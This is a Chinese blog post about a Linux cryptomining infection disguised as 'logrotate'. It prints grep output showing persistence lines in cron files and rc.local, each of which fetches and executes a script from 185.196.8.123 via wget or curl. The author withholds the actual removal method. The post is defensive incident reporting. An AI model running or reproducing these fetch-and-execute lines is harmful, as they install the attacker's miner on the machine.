【已解决】挖矿病毒 logrotate 185.196.8.123
https://www.518cn.com 发布时间:2025-03-18 18:52 作者:网络
摘要:如果你最近也中了这个病毒,看这篇文章就对了。 网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了... 经过本人几天的尝试
如果你最近也中了这个病毒,看这篇文章就对了。
网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了...
经过本人几天的尝试,最终找到了干掉他的方法。
先确定下你的症状是不是跟我一样?
问题现象:Shell登录慢,logrorateCPU占用高,这个进程的文件路径为:/root/.config/logrotate,删掉又重新生成。
使用find /etc | xargs grep -ri "185.196.8.123" 命令查了下,大概有以下文件被加入了恶意脚本:
各种级别的定时任务、系统登录、退出时执行
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants: 没有那个文件或目录 grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants/qemu-guest-agent.service: 没有那个文件或目录 /etc/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 grep: /etc/alternatives/mta-mailqman: 没有那个文件或目录 grep: /etc/alternatives/mta-newaliasesman: 没有那个文件或目录 grep: /etc/alternatives/mta-sendmailman: 没有那个文件或目录 grep: /etc/alternatives/mta-aliasesman: 没有那个文件或目录 /etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 /etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
解决思路:
正常解决思路无法清理掉,博主使用了一波骚操作来顺利清理掉。为了防止写此病毒脚本的人看到这篇文章来升级脚本,思路就不放出来了。需要的同学请留言,我来无偿发你
中病毒原因:我猜你大概率是开过8000端口
相关文章
子母钟系统,安徽京准助力高考精准时间 子母钟系统,安徽京准助力高考精准时间 京准电子科...03-18
京准电钟:NTP校时服务器于安防监控系统应用方案 京准电钟:NTP校时服务器于安防监控系统应...03-18
参考视频:https://www.bilibili.com/video/BV1itwgeHEEk/?spm_id_from=333.1387.upload.video_card.click&vd_source=e9...03-18
京准电钟:NTP精密时钟服务器在自动化系统中的作用 京准电钟:NTP精密时钟服务器在自动化系...03-18
EWM181-Z12S简易型zigbee3.0模块的技术解析与应用指南
一、产品概述:重新定义低功耗无线通信 EWM181-Z12S是简单易用型工业级ZigBee3.0无线模块,支持...03-18
这里要说的是,用户登录密码属于用户隐私数据。首先,隐私数据属于敏感数据,不能明文传...03-18
本文将介绍 TOPIAM 与 Wiki 集成步骤详细指南。 应用简介 Wiki.js 是一款高度可定制...03-18- 官方下载 夸克网盘 Kali Linux 2021.3具有以下优势: 增强的OpenSSL兼容性 扩大连接范围:重新配置...03-18
一.ELF文件结构 0x01什么是ELF文件 1.linux环境中,二进制可持性文件的类型是ELF(Executable and Link...03-18
京准电钟:北斗卫星校时器助力智慧电子政务系统 京准电钟:北斗卫星校时器助力智慧电子政...03-18
最新评论